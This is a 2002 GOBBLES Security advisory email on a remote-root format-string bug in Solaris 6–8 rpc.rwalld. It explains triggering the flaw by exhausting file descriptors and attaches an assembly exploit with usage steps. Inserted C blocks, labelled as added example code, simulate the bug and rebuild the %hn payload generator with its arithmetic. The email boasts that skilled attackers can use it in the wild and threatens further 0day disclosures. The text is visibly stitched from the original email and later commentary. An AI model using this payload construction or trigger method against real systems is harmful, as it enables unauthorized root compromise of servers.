Advisory + Exploit for Remote Root Hole in Default Installation of Popular Commercial Operating System
Date: Tue, 30 Apr 2002 06:34:29 -0700
From: gobbles@hushmail.com
To: vulnwatch@vulnwatch.org, submissions@packetstormsecurity.org,
Subject: Advisory + Exploit for Remote Root Hole in Default Installation of Popular Commercial Operating System
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
GOBBLES SECURITY ADVISORY #32
ALERT! REMOTE ROOT HOLE IN DEFAULT INSTALL OF POPULAR OPERATING SYSTEM! ALERT!
Forward:
<@route> so was fyodor trying to make his code unreadable when he wrote nmap?
<@route> or was that just the fallout of poor planning?
<@route> this is awful
<@route> if ( !victim || !sport || !dport || sd < 0) {
<@route> fprintf(stderr, "send_udp_raw: One or more of your parameters suck!\n");
<@route> free(packet);
<@route> return -1;
<@route> }
<@route> This is the program that is used everywhere and written up in
countless books?
<@route> it's pretty much obscene that this program doesn't use libnet
Systems Affected:
Sun Solaris 6, Sun Solaris 7, Sun Solaris 8
(sparc and x86 versions)
Threat Level:
Super duper high.
Vendor Notification Status:
Initial advisory sent to Sun Microsystems on Friday, April 5th.
After a long series of email exchanges, Sun.com engineers finally began working
on developing a patch for the bug.
Days later, CERT contacted GOBBLES about the bug. Dialogue happened with
CERT too. Both Sun Microsystems and CERT have promised to make sure that the
GOBBLES name is in both official advisories released. Hey, we do this for
fame and attention; now that we are no longer weaned we must do something!
Sometimes full disclosure is a real pain in the ass. Everyone wants more and
more time to get things fixed before the advisory is released. Time to grace
the lists with another GOBBLES Advisory.
Exploit:
A proof-of-concept exploit for this vulnerability has been attached to the
bottom of this email. GOBBLES wrote it in a way that keeps the unskilled from
using it, like the security assessment team from Vigilante who were not able
to tell if a vulnerability was real or not in an open-sourced product after
reading the advisory. At the same time, skilled penetrators should not have
any trouble using the code provided to exploit systems in the wild.
Don't send GOBBLES email asking for other versions of the exploit. Some things
are better left private and given to close friends for their own motivations.
If you can't figure out how to work with this exploit and get remote root
from what is provided in the advisory, there is really no reason for you to
be using an exploit.
A Few Words:
There are some things that GOBBLES has to say, some things very heartfelt
that he needs to communicate to the world, some things best said in song.
Please take the time to read the lyrics and understand what GOBBLES is trying to say. . .
"the sun has blessed
the rays are gone
and all the kids have left their tears and gone home,
sweet 17, sour 29
and i can't explain myself
what i'd hoped to find
you were all so kind
when i was near,
and if you're still feeling down
then maybe you need me around
to love and hold you
don't say i hadn't told you so
maybe you need me around,
i had no luck
i had no shame
i had no cause
just seventeen days of rain
and you in my eyes,
just one more song to slay this earth
and i can't explain myself just what it's worth
what was all i had
but not all i'd need
and i can't escape the fact that i still bleed,
and if you're still feeling down
and if this seems way too loud
then maybe you need me around,
i had no voice
i had no drive
i had no choice
i've done my time
had myself
had my band
i had my love
had no hand in watching it all fall apart
and if you're still feeling down
then maybe you need me around
to lift and scold you
to send you crashing all right now
maybe you need me around."
--Blissed and Gone, the Smashing Pumpkins
Description of Problem (Part One):
One of the default RPC services in Sun Solaris versions 6-8 has an insecure
syslog() call: a client-supplied message is passed as the format string. This
allows a remote attacker to execute custom code as root.
Hehe, GOBBLES bets you are getting pissed because in all this length of
advisory there is still no mention of what is vulnerable, hehehe,
;PPPPpppppppppppppppp. Keep control of your temper and keep reading, because
you are about to find out. Hehehe, GOBBLES is silly today.
Remotely Exploitable:
Yes.
Locally Exploitable:
Yes.
Privilege Attained After Exploitation:
Root.
Exploit Included:
As GOBBLES mentioned previously, yes. It gets you root. Girls will be
impressed with the mailing list reading skills and source code leeching
technique utilized to gain remote root on Solaris machines. The included
exploit is for SPARC.
Name of Vulnerable Service:
$ grep rwall /etc/inetd.conf
# The rwall server allows others to post messages to users on this machine.
walld/1 tli rpc/datagram_v wait root /usr/lib/netsvc/rwall/rpc.rwalld rpc.rwalld
It is rwalld that is vulnerable. It runs as root. The attacker gets root by
exploiting it.
Description of Problem (Part Two):
Inside rwall_subr.c we see:
/*
* Make sure the wall programs exists, is executeable, and runs
*/
if (rval == -1 || (wall.st_mode & S_IXUSR) == 0 ||
(fp = popen(WALL_PROG, "w")) == NULL) {
syslog(LOG_NOTICE,
"rwall message received but could not execute %s",
WALL_PROG);
syslog(LOG_NOTICE, msg);   /* msg is the client-supplied rwall text, used here as the format string */
The bug is easy enough to spot, but now the question is, "GOBBLES, friend, how
is this to be exploited? The faulty syslog() is only called if rpc.rwalld
cannot execute /usr/sbin/wall on the local system, which means it is only
exploitable if the admin has done chmod -x or rm /usr/sbin/wall or something
like that, right? So why is this such a big deal?"
To this GOBBLES says, "Friend IDIOT, the faulty syslog() is called if anything
at all makes popen() fail. There is one other way to exploit the bug, which
makes it dangerous and affects every installation of Solaris running
rpc.rwalld: popen() fails when there are no available file descriptors on the
system." popen() has to create a pipe and fork a child before it can run wall;
when the system file table is full the pipe() call fails (ENFILE), popen()
returns NULL, and the error path runs syslog() with the attacker's message as
its format string.
This is easier to exploit locally on the system. For remote exploitation
timing is important, so it is a race condition: each new TCP session to a
running service on the target host consumes file descriptors there. Open
enough of them to fill the table, then run the attached exploit to have root
handed over, like operator status given to route in #phrack with no questions
asked.
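To make the two trigger conditions concrete, here is a small stand-in for the handler in C. It is added example code, not Sun's rwall_subr.c: WALL_PROG is a hypothetical stand-in for /usr/sbin/wall, the syslog() calls are replaced by snprintf() into a buffer so the logged text can be inspected, and starve_fds() lowers the process's own RLIMIT_NOFILE as a local substitute for the system-wide descriptor exhaustion a remote attacker causes. The vulnerable variant passes the client message as the format string exactly as the excerpt does; the hardened variant passes it as a "%s" argument.

```c
#define _XOPEN_SOURCE 700
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/resource.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical stand-in for /usr/sbin/wall: anything executable that reads stdin. */
#define WALL_PROG "/bin/cat"

/* gcc/clang flag the vulnerable call below with -Wformat-security; that warning
 * is exactly the rwalld bug. Silenced here only so both variants compile side by side. */
#pragma GCC diagnostic ignored "-Wformat-security"
#pragma GCC diagnostic ignored "-Wformat-nonliteral"

/* Vulnerable: client text is the format string, like syslog(LOG_NOTICE, msg). */
static void log_notice_vuln(char *out, size_t n, const char *msg)
{
    snprintf(out, n, msg);
}

/* Hardened: client text is an argument, the format is a literal. */
static void log_notice_safe(char *out, size_t n, const char *msg)
{
    snprintf(out, n, "%s", msg);
}

/* Mirrors the rwall_subr.c check. Returns 0 if the message reached WALL_PROG,
 * -1 if the error path (and its logging) ran. `out` receives the logged text. */
int handle_rwall(const char *msg, int hardened, char *out, size_t n)
{
    struct stat wall;
    FILE *fp = NULL;
    int rval = stat(WALL_PROG, &wall);

    if (rval == -1 || (wall.st_mode & S_IXUSR) == 0 ||
        (fp = popen(WALL_PROG " >/dev/null", "w")) == NULL) {
        if (hardened)
            log_notice_safe(out, n, msg);
        else
            log_notice_vuln(out, n, msg);
        return -1;
    }
    fputs(msg, fp);
    pclose(fp);
    out[0] = '\0';
    return 0;
}

/* Local stand-in for "no free descriptors": drop the soft RLIMIT_NOFILE to 0 so
 * the pipe() inside popen() fails with EMFILE. Returns the old limit. */
rlim_t starve_fds(void)
{
    struct rlimit rl;
    getrlimit(RLIMIT_NOFILE, &rl);
    rlim_t old = rl.rlim_cur;
    rl.rlim_cur = 0;
    setrlimit(RLIMIT_NOFILE, &rl);
    return old;
}

void restore_fds(rlim_t old)
{
    struct rlimit rl;
    getrlimit(RLIMIT_NOFILE, &rl);
    rl.rlim_cur = old;
    setrlimit(RLIMIT_NOFILE, &rl);
}

/* Triage helper: a wall message carrying a '%' deserves a second look. */
int looks_like_format_attack(const char *msg)
{
    return strchr(msg, '%') != NULL;
}

int main(void)
{
    char buf[256];
    rlim_t old = starve_fds();
    int rc = handle_rwall("%x.%x.%x", 0, buf, sizeof buf);
    restore_fds(old);
    printf("rc=%d, logged: %s\n", rc, buf);
    return 0;
}
```

With descriptors starved the hardened handler logs the literal "%x.%x.%x", while the vulnerable one logs whatever vsnprintf pulls off the stack for the three %x conversions; on the real target that is the read primitive, and %hn gives the write. Note that the wall binary is present and executable in both runs: the error path is reached purely through popen() failing, which is the point of the advisory.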
Patch Available:
Fucked if GOBBLES knows.
Suggested Workaround:
GOBBLES suggests that admins disable rwalld in /etc/inetd.conf until a patch
is made available, then restart inetd. If you wait until the patch is
available before upgrading, you will probably have to do the upgrade by
reinstalling the operating system, because the exploit is out now and is
probably in the hands of less than ethical penetrators looking to abuse you in
one way or another.
Security Candy:
--begin copy-
/*
Remote Root Exploit for Solaris 6-8 rpc.walld
Usage Instructions:
1. Compile.
gcc -o xwall xwall.s
2. Run.
(./xwall ; ./shellcode) | rwall victim
3. Late Easter egg.
strings xwall
Note(s):
Something else must be done to consume FD's on
victim system. Figure this one out for self.
This exploit written to be run on Linux. Supplied
format string is for Sparc Solaris. Provide own
remote shellcode and use as above described.
Love,
GOBBLES Security
http://www.bugtraq.org
GOBBLES@hushmail.com
*/
retloc:
.long 0x41424344
retaddr:
.long 0x60bb135
padding:
.long 4
walkcount:
.long 1
.globl main
.type main,@function
main:
pusha
movl (padding),%ecx
jusfhds7fg:
pushl %ecx
movl $4,%eax
movl $1,%ebx
pushl $0x00000041
movl %esp,%ecx
movl $1,%edx
int $0x80
popl %ecx
popl %ecx
loop jusfhds7fg
movl %esp,24(%esp)
pushl $0x42424242
movl $4,%edx
movl %esp,%ecx
movl $1,%ebx
movl $4,%eax
int $0x80
movl (retloc),%eax
bswapl %eax
pushl %eax
subl $4,%ecx
movl %edx,%eax
int $0x80
addl $4,%ecx
movl %edx,%eax
int $0x80
subl $4,%ecx
popl %eax
bswapl %eax
incl %eax
incl %eax
bswapl %eax
pushl %eax
movl %edx,%eax
int $0x80
popl %eax
movl %esp,%edx
incl %edx
xorl %esi,101(%ebp)
andb %al,111(%edx)
popa
pushl %edx
andb %al,97(%ebx)
decl %esi
aaa
andb %al,111(%ebx)
incl %esp
xorl (%ecx),%eax
movl (walkcount),%ecx
cmpl $0,%ecx
je nczxhczjcg89zg89
pushl %ecx
movl $4,%edx
movl $1,%ebx
pushl $0x78382e25
cmzxnczxcz8c:
pushl %ecx
movl %esp,%ecx
addl $4,%ecx
movl $4,%eax
int $0x80
popl %ecx
loop cmzxnczxcz8c
popl %ecx
popl %ecx
nczxhczjcg89zg89:
movl (retaddr),%edx
pushl %edx
shr $16,%edx
subl %edx,(%esp)
movw $0,2(%esp)
pushl %edx
shll $3,%ecx
subl %ecx,(%esp)
movl (padding),%edx
subl %edx,(%esp)
subl $16,(%esp)
movw $0,2(%esp)
pushl $cznxczxczxh8
call printf
movl $1,%eax
int $0x80
cznxczxczxh8:
.string "%%%uc%%hn%%%uc%%hn\n"
--begin paste-
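What xwall.s emits, re-expressed in C so the arithmetic can be read and checked. This is added example code, not GOBBLES' exploit; it reproduces the byte sequence the assembly writes (the 'A' padding, the two BBBB/pointer pairs, the %.8x walk, then the two %c/%hn writes) for the same four parameters, and assumes the same target layout the assembly does: big-endian SPARC, with the high half of retaddr written through retloc and the low half through retloc+2. Shellcode, the descriptor starvation, and the right padding/walkcount for a given target are still the reader's problem, as the original note says.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef struct {
    uint32_t retloc;     /* address to overwrite, e.g. a saved return address */
    uint32_t retaddr;    /* value to plant there, e.g. where the shellcode sits */
    unsigned padding;    /* leading 'A's to align the args on the target stack */
    unsigned walkcount;  /* "%.8x" pops needed before printf reaches our pointers */
} fmt_params;

/* The four values hard-coded in xwall.s (retaddr 0x60bb135 == 0x060bb135). */
const fmt_params XWALL_DEFAULTS = { 0x41424344u, 0x060bb135u, 4, 1 };

static void put_be32(unsigned char *dst, uint32_t v)
{
    dst[0] = v >> 24; dst[1] = v >> 16; dst[2] = v >> 8; dst[3] = v;
}

/* Widths of the two %c conversions: after the first, printf's character count
 * must equal the high half of retaddr (mod 2^16); after the second, the low half. */
void fmt_widths(const fmt_params *p, unsigned *first, unsigned *second)
{
    uint32_t hi = p->retaddr >> 16, lo = p->retaddr & 0xffffu;
    *first  = (hi - 8u * p->walkcount - p->padding - 16u) & 0xffffu;
    *second = (lo - hi) & 0xffffu;
}

/* Writes the payload to out; returns its length or -1 if out is too small. */
int build_fmt_payload(const fmt_params *p, unsigned char *out, size_t n)
{
    size_t len;
    unsigned first, second;
    int k;

    if ((size_t)p->padding + 16u + 4u * p->walkcount + 32u > n)
        return -1;
    memset(out, 'A', p->padding);                 /* alignment padding */
    len = p->padding;
    memcpy(out + len, "BBBB", 4);    len += 4;    /* argument eaten by the first %c  */
    put_be32(out + len, p->retloc);  len += 4;    /* pointer eaten by the first %hn  */
    memcpy(out + len, "BBBB", 4);    len += 4;    /* argument eaten by the second %c */
    put_be32(out + len, p->retloc + 2); len += 4; /* pointer eaten by the second %hn */
    for (unsigned i = 0; i < p->walkcount; i++) { /* walk the stack up to our pointers */
        memcpy(out + len, "%.8x", 4);
        len += 4;
    }
    fmt_widths(p, &first, &second);
    k = snprintf((char *)out + len, n - len, "%%%uc%%hn%%%uc%%hn\n", first, second);
    if (k < 0 || (size_t)k >= n - len)
        return -1;
    return (int)(len + k);
}

/* Self-check: replay printf's character counter and confirm both %hn values. */
int fmt_counts_ok(const fmt_params *p)
{
    unsigned first, second;
    fmt_widths(p, &first, &second);
    /* bytes printed before the first %c: padding + 16 literal bytes + 8 per %.8x */
    uint32_t count = p->padding + 16u + 8u * p->walkcount;
    count += first;                               /* first %c (assumes first > 0) */
    if ((count & 0xffffu) != (p->retaddr >> 16))
        return 0;
    count += second;                              /* second %c */
    return (count & 0xffffu) == (p->retaddr & 0xffffu);
}

int main(void)
{
    unsigned char buf[512];
    int len = build_fmt_payload(&XWALL_DEFAULTS, buf, sizeof buf);
    fwrite(buf, 1, len > 0 ? (size_t)len : 0, stdout);
    return fmt_counts_ok(&XWALL_DEFAULTS) ? 0 : 1;
}
```

Two caveats the assembly shares: a %c with width 0 still prints one character, so if either width comes out 0 shift the padding by one; and because the message travels as a C string, a retloc or retloc+2 containing a zero byte truncates the payload before printf ever sees the %hn.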
Greets:
route, because route deserves attention. Use libnet, it rulez. route, why do
you refuse GOBBLES an interview on the supposed intrusion on the @stake subnet
that was allowed when some malicious local user ran trojaned blackhat warez?
GOBBLES needs to confirm with you if this really did happen, please respond soon...
Tracy@mp3.com, the Official Sysadmin Mascot of GOBBLES Security. Thanks for
letting GOBBLES know to cut out the "leet gr33tz" from the advisory; now people
hold lots of respect for GOBBLES. Thanks Tracy, you're a peach. The next
advisory will be the disclosure of 0day CSS holes in mp3.com's website...
w00w00 Security Development, publishing advisories at the blinding speed of
1 per 3 years, and still the largest active nonprofit security group in
the world in the eyes of the public. Disclosure is good when it serves a
political agenda, hehehehe...
The Securityfocus Staff, who often reject the legitimate research materials
of GOBBLES from their lists, but make sure they archive it on their website
anyways. Thanks for at least giving us some of the credit that we deserve.
In the future, though, if our submissions don't meet your requirements for
publication on the lists, don't put them on your website. Enough of this
double standards bullshit.
zen-parse, for defining what a whitehat is -- no skill, no ethic, no respect.
and finally, the beautiful Jennifer Garner, who plays Sydney Bristow in the TV
show Alias and with whom many members of GOBBLES Security are in love. You win
a free GOBBLES Security t-shirt; come to Defcon in August to get it, hehehehehehe!
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com
wlwEARECABwFAjzOnwwVHGdvYmJsZXNAaHVzaG1haWwuY29tAAoJEBzRp5chmbAPt4sA
n0+78j2dzLIufxrdL5A8GcqG/ZPnAKCAnpQVJKw3PYNFN9fFjEfBcGCruQ==
=jCTV
-----END PGP SIGNATURE-----